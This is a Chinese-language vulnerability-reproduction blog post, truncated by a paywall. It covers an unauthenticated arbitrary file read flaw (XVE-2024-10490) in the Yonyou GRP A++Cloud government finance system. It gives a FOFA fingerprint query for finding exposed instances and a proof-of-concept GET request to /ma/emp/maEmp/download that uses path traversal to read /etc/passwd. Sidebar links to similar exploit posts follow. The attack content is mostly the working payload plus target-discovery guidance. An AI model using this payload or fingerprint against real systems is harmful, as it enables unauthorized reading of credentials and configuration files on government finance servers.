用友GRP A++Cloud 政府财务云 任意文件读取漏洞复现(XVE-2024-10490)

已于 2024-05-14 12:42:04 修改
阅读量648 收藏
点赞数 7
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-05-07 17:32:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/138539217
版权

0x01 产品简介

用友GRP A++Cloud 政府财务云系统具有多项核心功能,旨在满足各类组织的财务管理需求。首先,它提供了财务核算功能,能够全面管理企业的总账、固定资产、现金、应付应收等模块,实时掌握企业的财务状况,并通过科目管理、凭证处理、报表分析等功能为决策提供有力支持。

0x02 漏洞概述

用友GRP A++Cloud 政府财务云 /ma/emp/maEmp/download接口存在任意文件读取漏洞,未经身份攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 复现环境

FOFA:body="/pf/portal/login/css/fonts/style.css"

0x04 漏洞复现

PoC

GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safar
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 7
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
订阅专栏
漏洞复现】C-Lodop服务任意文件读取漏洞
晚风不及你
01-30 1453
泰安梦泰尔软件有限公司经营范围包括:软件开发、信息技术咨询服务、信息系统集成服务、计算机、软件及辅助设备批发等。
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
2401_84252281的博客
04-26 736
任务环境说明:服务器场景:Server1。
任意文件读取漏洞复现
weixin_58954236的博客
09-02 4300
一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是漂代码文件,配置文件,敏感文件等等。任意文件读取与下载可能形式不同,但是从本质上讲读取与下载没有区别,从权限角度来讲,读取与下载都需要读权限。
用友政务a++手册
08-28
用友政务的 a++产品的使用手册,很有用的
金蝶EAS pdfviewlocal 任意文件读取漏洞复现
0xSec
01-08 1138
金蝶EAS pdfviewlocal接口处存在任意文件读取漏洞,未经身份验证的攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
用友grp-u8-行政事业单位财务管理软件g操作手册最终版.pdf
11-16
用友grp-u8-行政事业单位财务管理软件g操作手册最终版.pdf
(完整word版)用友GRP-U8-行政事业单位财务管理软件G版操作手册-(1).doc
11-17
用友GRP-U8-行政事业单位财务管理软件G版操作手册》详细介绍了该财务管理软件的使用方法,适用于行政事业单位的财务管理工作。以下是对手册部分内容的详细解读: 1. **软件的安装与环境设置** - 用户需通过...
GRP-U8行政事业内控管理软件V11.21安装教程
05-28
用友软件作为国内知名的ERP解决方案提供商,其开发的GRP-U8行政事业内控管理软件是一款专为政府机关、事业单位打造的信息化管理工具。该软件集成了财务管理、预算控制、采购管理、人力资源等多个模块,助力提升机构...
用友GRP-U8《政府会计制度》解析专栏之凭证编制及打印
12-13
用友GRP-U8《政府会计制度》解析专栏之凭证编制及打印,欢迎大家下载学习。
用友GRP-U8R10政府财务管理软件介绍分享.pdf
01-01
用友GRP-U8R10政府财务管理软件介绍分享.pdf
用友政务GRP-U8,近期常见问题85例解决方法
03-26
1.查询科目明细账会出现很多重复记录,2.查询明细账未按照凭证号排序3.自定义凭证打印,不打印上级科目名称:13....期初余额装入中导入Excel文件报错,17.以前是双凭证模式,怎么调整为单凭证模式等等85个问题解答。
用友GRP-U8财务管理软件国标数据接口输出操作方法资料.pdf
02-14
用友GRP-U8财务管理软件是政府行政事业单位财务人员专用的财务管理软件。该软件通过了GB/T 24589认证,并严格遵循公司研发质量管理标准,执行GB/T 24589-2010标准。GRP-U8软件提供了会计核算软件数据接口——审计...
用友GRP-U8财务管理软件国标数据接口输出操作方法参考.pdf
02-06
用友GRP-U8财务管理软件国标数据接口输出操作方法是政府行政事业单位财务人员专用的财务管理软件的标准化输出解决方案,旨在提高国家经济监督管理部门的信息化监管水平,提升用户的信息化应用、体验水平。
漏洞复现】企语iFair协同管理系统任意文件读取漏洞
晚风不及你
02-17 778
企语iFair协同管理系统是一款专业的协同办公软件,该管理系统兼容性强,适合多种企业类型。
漏洞复现】九思OA-wap-任意文件读取
知黑而守白
01-15 167
九思OA办公软件全面实现协同工作、公文、流程审批、知识管理、项目管理、综合办公、信息共享、移动办公 等应用功能,并能够与其他异构系统整合,打破信息孤岛,建立完整的有效的企业工作平台和移动办公软件。九思OA协同办公系统 wap 接口存在文件读取漏洞。攻击者可以通过恶意构造的请求读取服务器上的任意文件,包括敏感的系统文件。此漏洞可能导致泄露敏感信息,为攻击者提供足够的信息来进一步渗透系统。
漏洞复现】docassemble——interview——任意文件读取
最新发布
LongL_GuYu的博客
07-11 500
docassemble 是一款强大的开源工具,它让自动化生成和定制复杂法律文档变得易如反掌。通过这个平台,用户可以构建交互式访谈,收集必要的信息,并自动生成符合需求的文件。无论你是律师、行政助理还是研究人员,docassemble 都能极大地提高你的工作效率。其接口`interview`存在任意文件读取漏洞,攻击者可通过该漏洞获取系统敏感文件
用友GRP A++财务软件操作手册-重庆教育财务平台
这篇文档详细介绍了用友GRP A++财务软件在重庆教育财务平台中的使用方法,适用于开县教委的财务管理。这份操作手册更新于2011年8月30日,旨在帮助用户理解和执行日常财务工作流程。 用友GRP A++财务软件包含了四个...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值